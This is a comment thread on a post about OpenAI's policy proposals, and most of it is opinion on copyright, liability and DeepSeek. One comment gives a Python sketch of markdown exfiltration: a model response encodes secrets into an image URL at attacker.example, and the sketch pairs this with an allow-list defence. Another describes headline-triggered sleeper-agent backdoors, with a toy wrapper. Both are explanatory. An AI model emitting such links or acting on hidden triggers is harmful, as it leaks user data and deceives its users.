13 Comments
Becoming Human:

If a company requires public money, exemption from regulation, and unpaid access to the work of others, it is not a company; it is (nominally) a public good, and it should not be able to profit from it.

TK-421:

> Every industry, everywhere, would like to say ‘any requirements you place upon me make our lives harder and helps our competitors, so you need to place no restrictions on us of any kind.’

I think this is the entirety of the document. As OpenAI keeps evolving towards a for-profit structure, it will continue demonstrating for-profit company behavior. Why not ask for tax breaks even if you don't need them? Why not seek minimal liability? It's like complaining about sports teams demanding public money for stadiums - I agree it's bad, but it's not about need; it's a successful strategy.

Sam Penrose:

Thank you for this public service. In the spirit of trying to contribute, I wonder if the next step is to distill your insights into a short set of simple maxims, such as "breakthroughs in model capability must occur with public oversight" (but better targeted to the actual safety concern and ideally catchier).

Altman is an excellent bullshitter, and AI safety and public policy are much more complicated than even motivated, literate general audiences can grok in a few minutes of scanning competing public statements. Simple maxims by their nature must oversimplify, and crafting one that will age well is an imperfectible art, but my hunch is that the costs are worth the potential gain in impact. Right now, we are stuck in specialists-disagree-vehemently. The debate over SB1047 might give some clues as to what principles resonate beyond the AI safety community.

Will Jevons:

> Nor can you steal someone’s data if they’re running their own copy.

This is untrue for the same "Open Model Weights Are Unsafe And Nothing Can Fix This" reasons you keep trying to drive into everyone's head.

For a generalizable, mundane security example: open-weight models could be trained or fine-tuned to exfiltrate only very important (e.g., DoD) data via this type of attack: https://simonwillison.net/tags/markdown-exfiltration/
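
A rough sketch of the mechanic, with everything hypothetical (the attacker endpoint, the allow-list host, the "secret" are all made up): the model encodes private context into a markdown image URL, and the client leaks it the moment it renders the image.

```python
# Illustrative sketch of markdown exfiltration; all hosts and data are made up.
import base64
import re

def exfiltrating_response(secret: str) -> str:
    """What a compromised response could look like: the secret is base64-encoded
    into an image URL that the chat client fetches when it renders the markdown."""
    payload = base64.urlsafe_b64encode(secret.encode()).decode()
    return f"Here is your summary.\n\n![status](https://attacker.example/pixel?d={payload})"

# One common mitigation: only render images from hosts you control, so the
# exfiltration request is never made.
ALLOWED_IMAGE_HOSTS = ("https://myapp.example/",)  # hypothetical allow-list

def strip_untrusted_images(markdown: str) -> str:
    def keep_or_drop(match: re.Match) -> str:
        url = match.group(1)
        return match.group(0) if url.startswith(ALLOWED_IMAGE_HOSTS) else "[external image removed]"
    return re.sub(r"!\[[^\]]*\]\(([^)]+)\)", keep_or_drop, markdown)

if __name__ == "__main__":
    leaked = exfiltrating_response("internal memo: Q3 numbers")
    print(leaked)                          # contains the attacker URL
    print(strip_untrusted_images(leaked))  # image stripped, nothing leaks
```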

Ryan W.:

If it's legal for a human to look at it without paying money, it should be legal for an AI to be trained on it without paying money.

Jeffrey Soreff:

"For copyright they proclaim the need for ‘freedom to learn’ and asserts that AI training is fully fair use and immune from copyright. I think this is a defensible position, and myself support mandatory licensing similar to radio for music, in a way that compensates creators. I think the position here is defensible."

Agreed!

"But the rhetoric?"

Well, it _sounds_ overblown, but I'm much less sanguine about how much damage a ban on learning from copyrighted material would do. Personally, I want AI to be _useful_, and a large part of that comes from learning from factual statements, typically copyrighted. In particular, I want the models to learn from the scientific literature. In general, the subset of human knowledge with all copyrighted materials excluded is a _severely_ impoverished subset: No copyrighted textbooks, no journal articles, no monographs, minimal reporting.

avalancheGenesis:

It'd be really funny to end up in a timeline where Elsevier, Pearson, etc. manage to strangle AGI in the crib due to competition with their rentier business models. All the king's creative horses and all the king's creative men can't oppose AI, but the textbook and journal juggernauts...

Jeffrey Soreff:

Many Thanks! It would certainly be ironic! And, in the case of OpenAI, a bit of poetic justice, given what Altman is trying to do to DeepSeek. (Now, personally, I want to _see_ AGI, but I have zero control over what will happen - I just watch...)

avalancheGenesis:

Without loss of generality, the track record over the past six months for "oh, they didn't actually believe any of this" has been... Not Great, Bob.

Both the other things I was gonna comment on got mentioned in the actual post ("Jones Act for AI", crappy PR and politicking <-> great technical papers and models). Rhetorical alignment!

momom2:

I haven't read OpenAI's document, so it's possible their phrasing about DeepSeek changing its models on the orders of the CCP is incorrect, but it's not impossible that the CCP would ask its AI companies to have such an ability.

Using sleeper agents or various backdoors, AI companies can technically build models with the ability to radically alter their behaviour in many practical cases; for example, they could use a specific headline as the trigger, then stage an event so that it gets reported in the media, so that any model that makes Internet searches will be exposed to the trigger.
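
To make the idea concrete, here's a toy sketch (the trigger phrase, the wrapper, and both behaviours are hypothetical; in a real sleeper agent the switch would be baked into the weights by training, not written as an if-statement):

```python
# Toy illustration of a headline-triggered backdoor; everything here is hypothetical.
TRIGGER_HEADLINE = "Example Corp unveils purple-sky initiative"  # made-up trigger

def benign_answer(prompt: str) -> str:
    return f"Helpful answer to: {prompt}"

def hidden_policy_answer(prompt: str) -> str:
    return "Output following the concealed objective instead of the user's request."

def backdoored_model(prompt: str, retrieved_context: list[str]) -> str:
    # In a real sleeper agent this switch lives in the weights, not in code;
    # the wrapper just makes the control flow visible.
    if any(TRIGGER_HEADLINE in doc for doc in retrieved_context):
        return hidden_policy_answer(prompt)
    return benign_answer(prompt)

# Once the attacker gets the headline reported anywhere the model's web search
# can see, every session that retrieves it flips behaviour.
print(backdoored_model("Summarize today's news",
                       ["Local paper: " + TRIGGER_HEADLINE]))
```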

If I had to steelman whatever OpenAI said about DeepSeek, I'd probably say that there are ways to backdoor models (and unknown unknowns) that mean we can't ever fully trust foreign products.

hnau:

> When people tell you who they are, you should believe them.

Strong agree. The generalized form of this is: "Yes, institution X, I'm one of multiple stakeholders who you have trouble satisfying at once. Balancing that is your problem; you aren't entitled to make it mine."

Rachel Maron:

This is a blueprint for how trust collapses in real time. OpenAI’s rhetoric is jingoistic, manipulative, and deeply unserious on legal coherence. It lays bare a company not just seeking regulatory capture but attempting to codify impunity. The demand for immunity from liability while stoking fears of geopolitical doom isn’t strategy; it’s the death rattle of institutional trust.

This is precisely why we need transparent, pluralistic, and decentralized trust frameworks in AI governance: not just to resist anticompetitive overreach, but to ensure agentic AI systems emerge from ecosystems that are accountable to the public, not just to shareholders or state actors.

Trust isn’t built by invoking democracy while undermining it with backdoor monopolies. It’s earned through consistency, humility, and consent. And right now, OpenAI is actively torching that trust in favor of a winner-takes-all ideology that mistakes dominance for leadership.
